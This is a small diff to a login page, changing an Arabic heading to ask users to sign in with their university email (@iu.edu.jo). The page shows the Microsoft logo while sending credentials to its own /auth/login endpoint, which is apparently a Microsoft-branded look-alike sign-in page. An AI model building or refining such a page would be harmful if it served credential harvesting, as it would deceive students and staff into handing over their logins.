--- a/public/login.html
+++ b/public/login.html
@@ -86,7 +86,7 @@
 <body>
   <div class="login-box">
     <img src="https://logincdn.msftauth.net/shared/5/images/microsoft_logo.svg" alt="Microsoft Logo">
-    <h2>تسجيل الدخول</h2>
+    <h2> تسجيل الدخول بإستخدام بريدك الجامعي</h2>
     <form id="loginForm" action="/auth/login" method="POST">
       <input type="email" name="email" class="form-control email" placeholder="البريد الإلكتروني" required>
       <div id="emailError" class="error">❌ يجب أن ينتهي البريد بـ @iu.edu.jo</div>
